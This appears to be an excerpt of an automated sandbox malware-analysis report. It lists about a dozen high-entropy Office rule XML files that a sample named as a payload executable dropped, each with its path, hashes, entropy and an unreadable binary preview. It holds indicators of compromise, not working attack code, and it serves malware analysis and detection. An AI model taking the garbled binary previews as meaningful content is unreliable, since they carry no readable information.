                                                                                                                          Preview:<?xml.p....4.....K..G.G 7,...:;..z..z.,.0[O......Z.7.E.h16..vBCb....t...'...ym|/......d.X..6-%..7.\T...]..{I..0...d_...r...WM."m...t~..C...t.V.k.y...T\~..x.KK.%...?..($..MT.K?,..u..X.c].@14..j.P.rT%|b0..H.n.D..m...d.ZA.Z-...f....A ..?;.Z......&w...mEe....w#j.....,.=G.v.Q...........c......bY ..Ih.N..$\.y..Z....h/24#..>.n.........x~..l.v.1.....&..G.L.8.ZJ.F..M.~...UI^+..f...^.\E><..wZ..."[...-2SS.D..t.~>iL8.i/.=..o.......4.mQ.P. ....=..SF`...U!%w.v.g.......p.....b]..ArJY.N....cmU...HiU..d.....P..0..".B}...'.^..-h.r....<.W.oc..j.e.6P.@........:t......-g.}....}>....,.9g%......D.t(. .EJij.V..t.t.z-48..C....(BN:....7...+..r.'A.8..^\......j..@..Wh.*.P.:B.-..1..hl.Mhm..6.L..R@ap.k5p...&^....H..N.e....&...a.x...~..a..Y.T.#.-..q.x."8e.e1^1m.U.......,jVq.rzT...K....V...BcI..uFa.kE.!x..`X..v.x.2....dB.$......wXe%1K.0....l...D,5<.O....X..p.|@p.r2.as..uZ..c>..P.(W..-..V@.zY-..Rxc...C..." .,.@,..~3:..#....*UB.9n.......,....OJ...z..P?..+.$%g.N.5.....fqY.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10822v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4786
                                                                                                                          Entropy (8bit):7.956557299544726
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:EdXy7cNLmO25RMzD/WK7qYT1sPyad+2OcrtyX:Edi7cNLmO2YD/TGYTlaoJcrtyX
                                                                                                                          MD5:F569C8496B95280B01B5203102D383EB
                                                                                                                          SHA1:82963A89AE31633C4AE612D9E5A9F0A737050593
                                                                                                                          SHA-256:495D7EAD6F135F8AD0C403379940211DE0005D85B90906C7FEF3E3AD5491E431
                                                                                                                          SHA-512:532CF259574DCC259656EA7017EE0DFF9A2FD5D2A0ADBA8F5B1800C7B78E60F9452F8707460AF5D069EC481EB18999963F348CAA05B5EC9813E58A8F0558864E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.y.I.A2...#._..o..g...0.m...t..kpA...1...%..X..ar.;....-H.o....Wx......Yz.K..A.S.s..;.Z..m`k/.8k..Z.@.)%.|b.1..&k..0........b1{PTO.......l.f......$...b.}.F...p?Be.2..u.g....H.....K.P.`..6..&$o.P.086.DiMZG.:M#......3.S.?-..c.L.p.FG...*.L...#.5`....X.E1..M..E.....n.F...:~qvZ...L9. ...g..U...K.....N6...2b.h.R....Q....E.)..5j..a..h~..m..^.....~.KA.u.!Z.......).....W.m..]f..J.V.;..&..7..<...)I........o:P...UC.)..r4...|5=B..G..Nka..h.F..}..v.C.f(G;.p..X...@..K.}....`H.@}...l..E.ftB..kfZ..J...y...V.ZZ.!.......*....F..U.4.j...d`....k....j.b..N..b7.I..K...<..!.AA`..c..v*.[b0}.dIEu..CD...=.C..'.....$U1.;Z|l.c.R.A.......G.....u....(...!..b..jI....J....">*............0._.".IW.......p..h..5.......`..0.$.e..t.%....|}.\.Dr.(...@9....6.....u.>..a.+..&....; I...3.!W....i...._.#.......d...g.2......7T...q`?...n.....[..m..c.%fq.`<ps...;K..qf..W..8.y..d~..e..u.I..!"...H..@.\...c.a.2...(..W...........lq..tY..0==..)..[.qY...V..E.W.......D....)...X....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10829v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3030
                                                                                                                          Entropy (8bit):7.927076288755822
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:6uKTjc7Yb3xzGblXLLHZcwCqWDE6IDQqTxMNbKp51CveODgQQnzJ4zO27s6/IPxD:6F/c7ixzGbhXHZcwBkqx4GUveODgQfyJ
                                                                                                                          MD5:66C5BD1C252B6590B74A0BE113B7FBEA
                                                                                                                          SHA1:7FEF07E8C27DFC53A0D1DFA27692C8613A0ADC6F
                                                                                                                          SHA-256:782B92770DEB4856AEB8842AA9590D38E168B78CA7D8D17920EEC68C5E230898
                                                                                                                          SHA-512:C846C78256B3AC97471D02E590F7B84A3DB3C96A96D268EE4CCCC3283B093D9028AF8EB4A29603277849A123DEA168A7C1C11B733FF33A8EE4B64E40A4036961
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..((....Z>.8.e.....$.....g@.*......d.u..Y=..a.w;.Yq.&.c/.6.7&..@..#.D......Isb...=N]I..~C.L.obg2b`.d....dy.. .......M..X....'.oH.t....k...mY........x...(....!.....<M.....h.@..z.....]N......p..2.......l...+...".+D.....y@x...J0bA.....q...,.C..S..s.x.za....>"../.s.+..B.M.7.q..$i..Kx.{"w.}..A.......Ih.MCx..v....f._.3y-P...eg.G.....}...f...}.;;R.s..cP*....X.O.p..fj..|.....W..(.....I.L..Z#O.16..9.|...wY...j..hD.9....5._.....$L_....2CP*D....*<...|.1..gk..j.V...w.D..)M......V...S...B..."0.VRt..}.!%..I .t.).?0........HH.jN.!RRb.h..S..u5!e...>...Kx....A.^....L..#....ng'?..e........'i.%B...T.N.......@.60.....r]].%..e.........m...\.sGE3..."..6.a.b.s..#r8...k..IeYR..A..U.e(.1n.N.M...POw.v(ME.C..}.j.d.q.....|..&..R9...dg..`.n...Np....=..~..C..@.6./~...l.]x...S...%..:"J...A..$Q...3.-.w..XR..3..B.....2y.....e..M..60V....QCDV..S.9....OQX..X.i.("J...,.&...sl."v..qD.1.....X.9R..;.......!..}1^.J...{..<r.z.Np..."*.i........h.y........skw,..2.3.6jXuA..u.9

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10879v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):789
                                                                                                                          Entropy (8bit):7.724593353287298
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:KT1COZJ1A/qb7UMP6a6uJSsfkuNEiAy9fISBcF4Kic/2YLEWztq5bTcii9a:Q1CP/eA86aV9sLYfILH2JWzMbD
                                                                                                                          MD5:96731579C8F2D4220B5C8FE86040DA60
                                                                                                                          SHA1:65877D237EE9347C8BE9DB01F85A484D6C767456
                                                                                                                          SHA-256:7F2F10937E7C75168BE41B2D90B1F4A97219F48880FDD2D8459FE9FBCB6542A2
                                                                                                                          SHA-512:3D64CB7720596654D3E89C8DFC4E5877B349B83933AEBABEDF97219238EEB1A50014800A2765EE2C8E1637E4F538F351E1DA4E2D129693514FA454A57F81AB83
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..z.B...F..Z...bT..J|ow..5.f.>.xTr.5.o....0.6....s..2L.I......:B.4.A..;S...2-.7...b.-..;.......w....s..?.u.N....x....8...0.T-..O.a.K..&U1O.9.f...V....(._Ux..W....,..px.`D'.z8R..._.k.v U.XPEK'...B#...........(.....`....,$l`m.kV&.iq......#tS..nc....._..~(?......'.7.5/}.vf...h.j..>..;...M_.~.U.M5...f.O...C...{...ul.[.x1Rc]...\,[r..V...e.ejR....(*a.6.........f.nt....D......f....lDx1...N...~..x.r/...5..9..Ve L.0...htT!d.....$.........8(..W..vK...4..-e......)}....t..E..n.....;}?.#.S"....,..h.\.2wh9...../ .....7.'yps........mH......>,)..G.O.....}...%..i.o.I.r.V..T|..G..].wN.sq.y.d... j}......%..........w.^..../.E2..S.#R...C.n.gG.~s[.2.x!&.a.S.V......k..3.....h..C....M.7.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10880v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3017
                                                                                                                          Entropy (8bit):7.937803879228135
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:YEE4fyG8oDQVvQzgOAV7qpuIzaZpwP1sbCN+LprvlB5V/95RRR/Nd+1obCG+x4Ee:fDDQ1mAdqzcpw2CN4/95nRIoO1x46pN2
                                                                                                                          MD5:A5ABF3D5D8AFFC67BFB5DF6549129C77
                                                                                                                          SHA1:7032AC1309A6A0D013D9A009316953A0DCDD3539
                                                                                                                          SHA-256:1466B60BD0350E05B3CEB6ED67CA0F9795EA8766984612848412F7B01D282423
                                                                                                                          SHA-512:1D270917F3AA9822A3F0271E56639970EFAF329F5FAE9A446887704C495688B668436AB8F42CC5FF9D7B14AAC96623C8E988E5C249E0E20307DD14225D121AE5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...]....._8...*..6&;.\..P...S...X>....d.>..R....[R."qc...W.s..{....6;...H=../..J.1n..[..:c.<...6.YT....c........@....~..<B.........I:..3.{n..5..5.........y%.H.....v/V..>X...l`..'.<d..Lu.C."..MN.N.*....&.F{..Y ...i...)..`t.X..].l...+j..^b..b.B.A.%...PN....q...]...+G...>`........:7.'.@.q..sL.I...i#.I.....,...!..i."p.D.,....'.+.mY....Q...OLG3.OJ..K...)..;]4c.(...../.U..N..:...Dw....N...{..S...w.I.9.'[1\.<[._.s!..{.....Z.'.L..c..R.....K+pY!..Kd..l.........J..8I..K.(..q.....KU.)..<..tn_{F.-9.F..y.i.{.r..<....K/C....~...E..zZ.m.t...q..+..vs.....E`f....K%..L..E......N.O..i.i..:.IY.j0.0....P.*..3...S.......[..~...p.5.'.O..w\...E.h.../..(~k.3.(....x...,...*@.....]+...XE.m7..>2d..h.H...B.v....>+....{fbm.............M.2J]W]...G......'.?.........4K...;...}LD."./.J...?e..\..|...`...u..5Z-U'7.:?b.....w..=..I.z...p...U..fz..V+.....~.}+=.....0.....". ]/..F.... b.C 1..=]..6..T.J_....D.N1..x.V."...d......<....Q..."...].BPa.."l..>(

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10881v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):823
                                                                                                                          Entropy (8bit):7.688910189887597
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:jvjeloDFEc37DKbKGuzAqYmBuUQUknksHb5B0ARR+uGyq5bTcii9a:jvje2FrV9nQTdQ4ebD
                                                                                                                          MD5:7EF29CBACB593CF1BDD76E1C4B0167C4
                                                                                                                          SHA1:4E1EE461701BBAA6336E2FD0DF09DE848F92996F
                                                                                                                          SHA-256:14CE99777ABFD7208E433F4A5455106C24D72EBB49D068BBA277E8E5718A3C53
                                                                                                                          SHA-512:973AC73F7731F2E390A628A56F65F542DD3FA6CDA3570E6C02F7A1A5BD4D79AC48AD0A614ED820E7A587D117F1256B95A4FC6B8330BA84CF05E7E7CA3C8ED3CE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....(.c..a....q...I...J...J..s.*o-t.H.F>....B.<KOh...s...3...U..^fk........iSfiVz......T|.w W..............9....l.I#....@Z.....4\0i.=..'1.Z.....9..`.V...'..A.../.F....H..k.:....Y..0....L.O.".>D Q.EU..e......k..}s0....T..u...S....Ga5.X....A...k..}..E..{....$...8.?.K..^..Y.7N.AV.<....W@......c.~...2...G.'......$...H....[A5.FmK.......l..4....X.+)...r.?].!..'O.A...k.B..M...i=.U...IT.J.q......N.jtQ.`.H..h.L....#......E.1....;.m.{.x...R..V^xn~.\".....6G;..?.CA4. ..80_}.!qV.O.An'....[R.V ....ra...y.<az.(.i..sX..k.6;.......t..,.S.OY.#%..5*0.....R.Y..P...L@..O....)..f.~.y@.?7(.]..;s."E.....E..?.0N.....`jkC...GA..a......n......n+o4{.Q..'g...C.i.....Mw...`.......}.M:.{.CbD...P$.......C.V..O..~q.......6phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10882v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3017
                                                                                                                          Entropy (8bit):7.9396141717460775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:/3ZQGVDrcwXJYUgY2J16tLxHsGqevazr4LRFNXPbnYFzBzVk/AbNpNjC7uKRykVT:fGGRIQL2qeGqWCrmlnU5Vk/2/4uqyk2y
                                                                                                                          MD5:2440683AE61C7C2AC4DFEF17F7FBE963
                                                                                                                          SHA1:AB19C3D0FB0EA243289DB6BA357BD89876A9B225
                                                                                                                          SHA-256:C18B5AD1F73A7E9F8BBE956ABAFC4BF1AE2CD09DAC462B40B1B5507B089E1378
                                                                                                                          SHA-512:E2070DCFA6430F8A73F9B8EC1FCF7BE90AB2579AC0A513440BD1173CD8263BBB04E1C440B6A1DD7115BEDE9064535090C5CB0B5F5ED8D60EC5806AFAFDB30178
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......M...g....H...WGW_0[}.P4.jEB...[.Q.......&.._.}>........i.%.......$......p..&\.:...`2.M/|...g..[...].[P...|.k.A.g.(.)s......w...I....;g.0........./#...v}].(...G.S.u6!...U......N.$......B9|al*l....k.l.nB...;T...S...jT.S...3>.<.....sT{..='O.!(..R.f`>...g=.Le..a@...;X....8..O..$IYn.kT...4....!W$q`....@.K...NV.g.L3.._\..\..8n........d.B.....Z/...vV.2...sA..Y.....X.Z....j.Ut]..t'%,u;.=....._.#.tI..O].b@.:.$.t....&...0....M.....n%...Ww69.k...p..}:Q&s;...e.b...c.'..3.6.p.h..-t..(o..p.~..*.!cH6..a.$..*#..gJ.........v....f.o..Z.....8Pq`.:.....U]./.V...........e..>...k.Cr.VH...3}I.7..M...E.*^,....`.~.|.......eo.o.....N%R.[..Pc.....QF...c.nE.@*......K.+..V.*0..F.&.)..E....omU.....s.(.o..M.+.....}.cBx.". \.Zv.u92....aR..c...|J..9o....Ac...%WjnXS....3.HFU.....1...>.@.L.g.}.U......a./*7.....|j.*...?]+....V..<.0L..G..$Bn.J#.o...9..k.T.......@..=.f.H...<H.c.p..p....W....E..T.1.O.>a.%....:.g..M...xs_........o. -.......C..c...A\K.x..\.A...mL..w.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10902v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1021
                                                                                                                          Entropy (8bit):7.76477960627793
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:22QOrB3a+ZMbBWt1QCQwtT5OXmF+6nt4jOzqUSFvbD:2E0bBi6wtT54c+U4jhpFzD
                                                                                                                          MD5:490FA372976227119EC8FA055A92F89F
                                                                                                                          SHA1:1AEEC2670268435BBF4404D6F7A10911101169BF
                                                                                                                          SHA-256:ED9CCF1C309A9970DD6AD38C8D301B7D325E3801F2DFC4A96A51C7E2789FA215
                                                                                                                          SHA-512:863629DEE07F1AEB2D8481C31DE4C0352AA540CD6BD3340B075DD916DC0C1FC7CF570CC53251BFC203CB4D9970FC19E95C4E6CBCC2D51BEE9CC974DECA24A049
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...(.t.....d.u@..j>{.........W.G=.^.?Mq.t.J....X......Q...N.o..`T.......#..........'..U.S..$...;.%...J.5.FC46.jPB.i<.. .8.....E....0..I..*..^.R:...BY..RJ.=..y..$%J....KR.:.#A|o.h^.....Y...z;....9....m.M.dP....P..XJ../....X..p.bq.I.I.'...Q.8.~%.../..i.E.+.eo.......AK...-..|..A.........m..N$...V.zW..O.....:./.....A.H&..:....n....^r.;J5q3..@.^34Z9.qW.tq?..d{.XD. .H...H.y$...6?..XP..3O1q........`H+......{........MD.4%../7.A..ei..jl\.......B.$...e%eS.h.o....n.......:...~.;.2XH..j8..h..J..:.....zE.r>j$..o.T...-.:.z..1I.[..s.o..U..YU...../.{.d.P.k.G).b[.L..lH6...#Y*....O..R.._k...~t.&\.......1.U.=6.(9...B..E1"........Q-.F...M.Ef.....g.gK_..P..=3..&..Nv....._q;.-6...hL_.=.&.=f.....'Y..~...).3.~N.>..Z..U...{.D.a....uU.W.w....`.....PZ...Ym._ ..e..._..`...Z.....:P.|.....>^I.'...6.hU.5iF..3.Q....w.2.i.c).I#....hh.L..N.J....wZ...R.=.S.3.......,K.l....}..s......+.{.....q.h6DJ..%.%+z.5...7gH..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10906v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1398
                                                                                                                          Entropy (8bit):7.835298653758463
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ZKE4XU03UWzURPt4NU/gx+8eI6bphTspd1fdaW2W0V4JmGdZiomaR9jewbD:ZSD3rU74NO8SVhQpdPJ2W0V4J8raZD
                                                                                                                          MD5:AAFAE3A7312D31137464839A0A0F476A
                                                                                                                          SHA1:79EBC25761821436C8FE5BE108AB623C86CB717D
                                                                                                                          SHA-256:C36575A03AA8606B5241468F5CC4E5586B5CBFBABCE18772AF9C24729D90435F
                                                                                                                          SHA-512:0B26D10F695D02FE1CB00AD479908C1F157738A5134EFCAE9B3AA54B03882735A825650099FCE85C2E9C91C1B313D24935739671442E3ADA990E93F987515F6C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..f...7!s.U.u........c..i ...t.8..m..j...\.+..$s..j...pg=(_...{c.V....bj.....^..7...dVe.a...P...O..]....H..s.....N;....K..}R.}..ZJ...z...6.....[.*F?<.T.a|2.oN4...R.vF....T..D...=...].~U..v.T.3..;=d.z}.._.T.Q...+.W..y..P~w|x..;..K>....|8G...|1.......48. A;.g.Pt<I.=.S)dXj.Q(._..C..o..E..V.'._.....7...n....;(o...7....]Z..x]O.........6..G.u.....=3x.rQ....K_p.j.D.jeU..........F?4..L<..%.{N.&..f..s..U.......{......H....o....`......2C.@..{c..[.J?O..{Y........m!...j...;.....Z|.......S..}...'1..z!.....C7.s.C...+.5Pt..~.$..m..>....yX7"...@.......!...h/@S.I.K.W.+.P}....t.0....\...<.[..........dJ...N.r.H...Q......]..G.5..L...t.P..}..[.o<....w..#...a.}.....ud...?.....O...Y.F.p..?17....n.{.tl..|. VoW.x..CP.h.W....l..../...f....R.>I>[....~....-..5.CAKA....v..?~.h.:...Y*..X>..&..!....R.G.7$.dw.p#~.@..gY...8b...]..d.I....5.%.1.....A.R.m.d...$...z...; _...;..Y.v..z.o......w$.;.;..eU..^.d.%.U.d..1....Pk.t!r.7...N. .|....,..,6.5..-.S.W...Q...7S).p.}.l......O..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10907v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):937
                                                                                                                          Entropy (8bit):7.808913292966896
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2EyjIrbhW8qH2gJDkzpflnrCYpUASwxuzkprAHqbD:2Ey422gJAzpZ2IUAf2kuoD
                                                                                                                          MD5:EB3D66BAE08D3E9B5DD486A76D05B3ED
                                                                                                                          SHA1:9CB4C0054AB9492F8BFD3681CAD59812895EC90A
                                                                                                                          SHA-256:0B0AFCAEB755471CEFDF469732FE64795513EB392542B2A5F05037E3F66E8395
                                                                                                                          SHA-512:5B7FC2C6CD81B5EC8E2B8194D7FE3FE7F29DC1B4A507C149F97AD6F3FD23C5088A2C5461B9385B3C2D13A0A583775348F37321CB4D046B5D69051602CDE255A9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....O..ya...3.7.B...1..@.GV..{.....:... ..V...V2..I.[<...k.=+.o./.v...z...A.......'B...:0..\1.)..q....[:k..p..J...Ia..+,.|..-N.....S..;*..\.<.|V.....V..,.d.^.^..{...9 .].......F.Z...U.B.xF...:.l.p...At. .c..Z....1.y5..C.0.g<..(....1..@.*..-....8.....l*z....2.H..zYh.bs8..V#...D.G\tK....F.T `..K....Q..`...;.Cq.BK_>...R....pc.>>..)l...5up`BE.A..^...z.....sJ6f.o.v.1...Q....WZ.&I.>...+....#...c..*...}O6.JLR.M.).R.....x -Q.....*O..T/..h..?`....v...z).uX....Ij.u.E.<U.....5...Mt`..$.J....s2 ..#..~ ]#...qf..B."lh2i.....P......7..*.dC5...D.....X./..v....3 P..J....A0,=.T!.9..2...^.....I......N...."M.=....q.zd...+.rt...[ch.U..n.tb..xh$...x....o]..9......Pj...Q.YbX.c...VCP..]a.n..H.K.P...... .u...+..y.t.G.....%.W".3J[.._.Ny..."...........o.....F~.wk....@S...v....!p..\.)...7..i....v.....X.1...g..-..MEeF.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10924v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):891
                                                                                                                          Entropy (8bit):7.753038440361364
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:LdRFQABMvKob3kV+TWRF8zQhWm1+a/n7aFGbD:rmzvf3kV+IF8zQciD
                                                                                                                          MD5:FF91BB9000C6C92304657EE906D58892
                                                                                                                          SHA1:9F340E2DB221A1E3875D57B267BED155B868E49D
                                                                                                                          SHA-256:2BDB5F737333BBADAFAFAE951BB669068DB941B64563156AB766865D60EEE1B4
                                                                                                                          SHA-512:4CB4D6FDB01ABE57B97C5005D5955077D49B9004928111243E681E3497AE2157DE470410571E00091E33A76A968578760E73A4BDF4A100ABC22AC03688C22F4F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..i.{.....[. .W]..6&...d.\c...L..}.:.y.s..*2h-..:.......s.G...u.:......;.U.%.7ZM...Tq......9.ro.n....d.L..WG...0..AFI.'..U.8.r=.1.Z../..k$(u?L..y[...W.c.)./<.`...`@........[.f.B....S.Ue.....aq.E..P.k..q.......d...02G6...!..;....,MG.kb.~6PurVJ.X..(..b{....G..d..3`7.S."...m..:.6Y....a...3...|...e.p...3R..q..1(.Z..9.m.K.<NN............Qt.8.D.T..I...}}...:.OS.....8.).^.^.6X$*k.........G.}5...4.s.J..x...Fz..+N-..!.z.@..y..Z\..Ky.wQ..L.A|W.....].&.H.F<..... P.!...Kd5.@.(r.G.........[..;Ii.OGu...q.c....$Z[4........l...s.....}...b....3.6...G.Bk...6..#......]o.#.Db...N...$.....-X......z/..eOS=..i..7.K..@.3...t.PK.bi9jl.].=.y...XE.........p..r.........[..^M.SDd.C.(.w,c2.9UAX...'c...|%*..$F.._.C.)..4`.....Z..5.A..o.........T}._)..~.`....3K.cd..c{...{ ._Uw.GG.......qphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10925v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1049
                                                                                                                          Entropy (8bit):7.7951467116221265
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YIQ8Eqk+2SgO1QC77pmVdmZ8HoaWbvWOWJb4LuvL8bD:Y3+Fn77wjdoaWbuz5hLWD
                                                                                                                          MD5:D32B9BC90CF36ED82B01D919553DC49C
                                                                                                                          SHA1:EF02CEB3F9DE485EC2D76EDC81D593E5CB6F8585
                                                                                                                          SHA-256:E5F8CB550272CDD79F814553A0DCF574DE4CF82051BD347EFB3431F81935DD9A
                                                                                                                          SHA-512:A5B981A0787A9DCD4ECB692697288FABB7D7B9DD9E14A2630AB028E65300F8BC0B4A0B1B71C13878ABE9C282D4EDAB89A4230CEA67CAC04DBD774ACE2FC0BCEA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..w>KFg@.....d.Y.,..Bi.0.V.l\.......;...T.x.'R.W....i.Q!oD'.....Cx...."5..p...O.d....(<....s..".M..N2"+..6....\......vD.jm..)c.~....g.{....="..f`M...."..}...[0...cm.`.hy...>..H./..+>9m...y..D.o..I.D.xE^Y....W53....S1.ya...8.U.i..M..g..vd....7.@l...~..s{Gt.<.v.!.3...|......h,....D..]T.!...q.X..w......A.%d\C....8a?......k...6...nqg."D.-.{...4...>5..D.-O.T..'......Y..#.I.F...sK.t9.i....A.c..[..j........xC(.|z)...t'...Hg....a`...1.t....^e...(..u.h.-........~S.^..V=...Z......f.@.{#.'..U.h.....-<.l..Ah..|...........|<.t.=. S\P.L.@s.0.x6.........I...I......gJ...A{m.%..YJ.?Wc_..WdlU....).fz./)..BB.\M.b..+..#...9`.q...]Z(...':.G.k..H..kP.....P. ...Z...)^k....*>...dv..g.P=y.;)..-{..;....W.U.=1.&..JO.[..9x.x,@Y..q...%.....a.....y.....xsd.7#........:F.j!.D.....W\...&m>..v....I.....]..Pt\O.>b.l....y...'...B!..)Z..j..I.q({..?_.[...].7...B...7eJ.......7f....F%..........W.(.Wz...<...9.Y..+3.......cT..'..f[.b..O+.dK...4.'..phJtdHo970vyx7vwlYG00OakDR75R

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10940v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):885
                                                                                                                          Entropy (8bit):7.742467949900452
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:UQXGm6NBzDzNo0du3m8OoZLUVF/hLwgyb97MlbD:om6NBzDho0uJTsF/hUb97+D
                                                                                                                          MD5:6C7DE7728E080C0C24F33578B3154805
                                                                                                                          SHA1:650A9CE5464AD697D5823950638A1BF781F9E94C
                                                                                                                          SHA-256:C7661EC5F7A8978808E62D7ED1C770EC02473DD79930CD7666277C0DE7FF8407
                                                                                                                          SHA-512:2F11FF68A06A08EB93F599786A309AE176F0E3AB30EEF951CCFAADA2309381F3DA2CCB78708461D18DB30C03BF7AD3228CFF55A9EAB36FD89879AACAB5110495
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...U..<..d3..5..p...;.}E+J.a.Vrr.p..C&.>#.h).O...X6.7...ub...d.N:....:..%._d..N.b.D..]..A.N..6%1.X.....#.....u..[&..M..:...o.....$...>.j!g.h.....,..p].fF3..o..]...`5..'.@..$...G...#.....m..v.d./b.....(GkS..x.....k@......a:..\.?B,c0..+.'..C./..%.....o.F...5.6c..b_..4|K....h~.]...z..,./".Y..._..n..*iI..?.e...(.;"!)..G..l)....Fq....G...s{......L.\.....Ii.1... .9.PM.O...M&.vq....l..y..(..p.:.R.D.s.^.-.|..z4G.x.?Q..O..+e.O..=.9.....s.M[..DJ./f.L.N.l....t&31?...+...3DH(....m*.E..vfU.GJ.Hv.=..t..^.A.5.:....E.5.......Zn...{..-..y..]..GG.75.5.F.O"\...L.."..T_J....).V..n..O..e...7..j2... 5....._...*.Rl.@.EO..Auc.:...SB7.....A`$.X6..{P...t@.{.03....o../h.........<..XV.....f,.1F6....S..Oyq..*'......A.)8.V..j.*.....V:..VY..\...L....6..m.|...B..9w.w....b.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

